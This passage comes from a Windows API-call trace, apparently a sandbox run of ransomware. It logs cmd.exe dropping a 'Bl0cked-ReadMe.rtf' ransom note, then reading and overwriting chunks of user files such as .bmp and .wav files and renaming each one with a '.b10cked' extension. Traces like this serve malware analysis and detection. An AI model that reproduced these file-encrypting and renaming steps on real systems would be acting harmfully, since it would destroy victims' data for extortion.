cchLength=0x20 | out: lpsz="TYPE \"[FROM_PATH]\" > \"[TO_PATH]\"") returned 0x20 
[0223.975] CharUpperBuffW (in: lpsz="[FROM_PATH]", cchLength=0xb | out: lpsz="[FROM_PATH]") returned 0xb [0223.975] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\Desktop\\GbkI\\ftTfHtfADyQIa-_\\", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\Desktop\\GbkI\\FTTFHT~1\\") returned 0x27 [0223.976] CharUpperBuffW (in: lpsz="type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"[TO_PATH]\"", cchLength=0x42 | out: lpsz="TYPE \"C:\\USERS\\EEBSYM5\\APPDATA\\ROAMING\\BL0CKE~1.RTF\" > \"[TO_PATH]\"") returned 0x42 [0223.976] CharUpperBuffW (in: lpsz="[TO_PATH]", cchLength=0x9 | out: lpsz="[TO_PATH]") returned 0x9 [0223.976] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\EEBsYm5\\Desktop\\GbkI\\FTTFHT~1\\Bl0cked-ReadMe.rtf\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12fb94*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12fb84 | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\EEBsYm5\\Desktop\\GbkI\\FTTFHT~1\\Bl0cked-ReadMe.rtf\"", lpProcessInformation=0x12fb84*(hProcess=0x120, hThread=0x1b4, dwProcessId=0xd44, dwThreadId=0xe78)) returned 1 [0223.978] CloseHandle (hObject=0x120) returned 1 [0223.978] CloseHandle (hObject=0x1b4) returned 1 [0223.978] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop\\GbkI\\ftTfHtfADyQIa-_\\Bl0cked-ReadMe.rtf" (normalized: "c:\\users\\eebsym5\\desktop\\gbki\\fttfhtfadyqia-_\\bl0cked-readme.rtf")) returned 0x20 [0223.978] 
CompareStringW (Locale=0x409, dwCmpFlags=0x0, lpString1="\\", cchCount1=1, lpString2="\\", cchCount2=1) returned 2 [0223.978] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\GbkI\\ftTfHtfADyQIa-_", lpFindFileData=0x12f9e4 | out: lpFindFileData=0x12f9e4) returned 0x1fec00 [0223.978] FindClose (in: hFindFile=0x1fec00 | out: hFindFile=0x1fec00) returned 1 [0223.979] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0223.979] ReleaseMutex (hMutex=0xf8) returned 1 [0223.979] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0223.979] ReleaseMutex (hMutex=0xf8) returned 1 [0223.979] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0223.979] ReleaseMutex (hMutex=0xf8) returned 1 [0223.979] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0223.979] ReleaseMutex (hMutex=0xf8) returned 1 [0223.979] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Desktop\\GbkI\\ftTfHtfADyQIa-_\\65OAv.bmp" (normalized: "c:\\users\\eebsym5\\desktop\\gbki\\fttfhtfadyqia-_\\65oav.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1b4 [0223.979] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0223.979] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xa692 [0223.979] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0223.979] QueryPerformanceCounter (in: lpPerformanceCount=0x12ed38 | out: lpPerformanceCount=0x12ed38*=28076829663) returned 1 [0223.979] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | 
out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0223.979] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xa692 [0223.979] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0223.979] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0223.979] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xa692 [0223.979] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0223.979] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0223.979] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0xa692 [0223.979] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0223.980] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0223.980] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xa692 [0223.980] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0223.980] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, 
lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0223.980] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xa692 [0223.980] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0223.980] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0223.980] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xa692 [0223.980] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0223.980] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0223.980] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xa692 [0223.980] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0223.980] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0223.980] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xa692 [0223.980] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0223.980] SetFilePointer (in: 
hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0223.980] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xa692 [0223.980] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0223.980] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=-1256, lpDistanceToMoveHigh=0x12ecec*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecec*=0) returned 0xa1aa [0223.980] ReadFile (in: hFile=0x1b4, lpBuffer=0x12ed94, nNumberOfBytesToRead=0x4e8, lpNumberOfBytesRead=0x12ed2c, lpOverlapped=0x0 | out: lpBuffer=0x12ed94*, lpNumberOfBytesRead=0x12ed2c*=0x4e8, lpOverlapped=0x0) returned 1 [0223.981] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecec*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecec*=0) returned 0x0 [0223.981] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0223.981] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0xa692 [0223.981] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0223.981] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec4c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec4c*=0) returned 0x0 [0223.981] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0223.982] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, 
dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0xa692 [0223.982] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0223.982] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0223.982] ReadFile (in: hFile=0x1b4, lpBuffer=0x1273a68, nNumberOfBytesToRead=0x5348, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1273a68*, lpNumberOfBytesRead=0x12ec08*=0x5348, lpOverlapped=0x0) returned 1 [0223.982] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0223.982] WriteFile (in: hFile=0x1b4, lpBuffer=0x123fd48*, nNumberOfBytesToWrite=0x5348, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x123fd48*, lpNumberOfBytesWritten=0x12ec1c*=0x5348, lpOverlapped=0x0) returned 1 [0223.982] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=-21320, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x534a [0223.982] ReadFile (in: hFile=0x1b4, lpBuffer=0x1273a68, nNumberOfBytesToRead=0x5348, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1273a68*, lpNumberOfBytesRead=0x12ec08*=0x5348, lpOverlapped=0x0) returned 1 [0223.983] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=-21320, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x534a [0223.983] WriteFile (in: hFile=0x1b4, lpBuffer=0x123fd48*, nNumberOfBytesToWrite=0x5348, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x123fd48*, lpNumberOfBytesWritten=0x12ec1c*=0x5348, lpOverlapped=0x0) returned 1 [0223.986] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="65OAv.bmp", cchWideChar=9, lpMultiByteStr=0x0, 
cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0223.986] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="65OAv.bmp", cchWideChar=9, lpMultiByteStr=0x131324c, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="65OAv.bmp", lpUsedDefaultChar=0x0) returned 9 [0223.986] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ece0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ece0*=0) returned 0xa692 [0223.986] WriteFile (in: hFile=0x1b4, lpBuffer=0x12f27c*, nNumberOfBytesToWrite=0x4e8, lpNumberOfBytesWritten=0x12ed20, lpOverlapped=0x0 | out: lpBuffer=0x12f27c*, lpNumberOfBytesWritten=0x12ed20*=0x4e8, lpOverlapped=0x0) returned 1 [0223.987] CloseHandle (hObject=0x1b4) returned 1 [0223.987] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\Desktop\\GbkI\\ftTfHtfADyQIa-_\\65OAv.bmp", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\Desktop\\GbkI\\FTTFHT~1\\65OAv.bmp") returned 0x30 [0223.988] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\Desktop\\GbkI\\ftTfHtfADyQIa-_\\", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\Desktop\\GbkI\\FTTFHT~1\\") returned 0x27 [0223.988] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\Desktop\\GbkI\\FTTFHT~1\\65OAv.bmp\" \"C:\\Users\\EEBsYm5\\Desktop\\GbkI\\FTTFHT~1\\65OAv.bmp.b10cked\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12ecec*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), 
lpProcessInformation=0x12ecdc | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\Desktop\\GbkI\\FTTFHT~1\\65OAv.bmp\" \"C:\\Users\\EEBsYm5\\Desktop\\GbkI\\FTTFHT~1\\65OAv.bmp.b10cked\"", lpProcessInformation=0x12ecdc*(hProcess=0x120, hThread=0x1b4, dwProcessId=0xf74, dwThreadId=0xef0)) returned 1 [0223.990] CloseHandle (hObject=0x120) returned 1 [0223.990] CloseHandle (hObject=0x1b4) returned 1 [0223.990] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Desktop\\GbkI\\ftTfHtfADyQIa-_\\", cchLength=0x2e | out: lpsz="C:\\USERS\\EEBSYM5\\DESKTOP\\GBKI\\FTTFHTFADYQIA-_\\") returned 0x2e [0223.990] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Desktop\\GbkI\\ftTfHtfADyQIa-_\\", cchLength=0x2e | out: lpsz="C:\\USERS\\EEBSYM5\\DESKTOP\\GBKI\\FTTFHTFADYQIA-_\\") returned 0x2e [0223.990] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\EEBSYM5\\DESKTOP\\GBKI\\FTTFHTFADYQIA-_\\", cchCount1=46, lpString2="C:\\USERS\\EEBSYM5\\DESKTOP\\GBKI\\FTTFHTFADYQIA-_\\", cchCount2=46) returned 2 [0223.990] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0223.990] ReleaseMutex (hMutex=0xf8) returned 1 [0223.990] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0223.990] ReleaseMutex (hMutex=0xf8) returned 1 [0223.990] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0223.990] ReleaseMutex (hMutex=0xf8) returned 1 [0223.990] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0223.990] ReleaseMutex (hMutex=0xf8) returned 1 [0223.990] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Desktop\\GbkI\\WtCCLcHrwK.wav" (normalized: "c:\\users\\eebsym5\\desktop\\gbki\\wtcclchrwk.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1b4 [0223.990] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, 
dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0223.990] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xa41e [0223.990] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0223.990] QueryPerformanceCounter (in: lpPerformanceCount=0x12ed38 | out: lpPerformanceCount=0x12ed38*=28077949460) returned 1 [0223.990] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0223.990] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xa41e [0223.990] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0223.990] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0223.990] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xa41e [0223.991] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0223.991] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0223.991] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0xa41e [0223.991] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, 
dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0223.991] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0223.991] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xa41e [0223.991] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0223.991] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0223.991] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xa41e [0223.991] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0223.991] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0223.991] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xa41e [0223.991] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0223.991] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0223.991] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xa41e [0223.991] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, 
lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0223.991] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0223.991] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xa41e [0223.991] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0223.991] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0223.991] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xa41e [0223.991] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0223.992] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=-1256, lpDistanceToMoveHigh=0x12ecec*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecec*=0) returned 0x9f36 [0223.992] ReadFile (in: hFile=0x1b4, lpBuffer=0x12ed94, nNumberOfBytesToRead=0x4e8, lpNumberOfBytesRead=0x12ed2c, lpOverlapped=0x0 | out: lpBuffer=0x12ed94*, lpNumberOfBytesRead=0x12ed2c*=0x4e8, lpOverlapped=0x0) returned 1 [0223.992] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecec*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecec*=0) returned 0x0 [0223.993] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0223.993] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x2 | out: 
lpDistanceToMoveHigh=0x12ec60*=0) returned 0xa41e [0223.993] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0223.993] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec4c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec4c*=0) returned 0x0 [0223.993] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0223.993] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0xa41e [0223.993] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0223.993] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0223.993] ReadFile (in: hFile=0x1b4, lpBuffer=0x1273a68, nNumberOfBytesToRead=0x520e, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1273a68*, 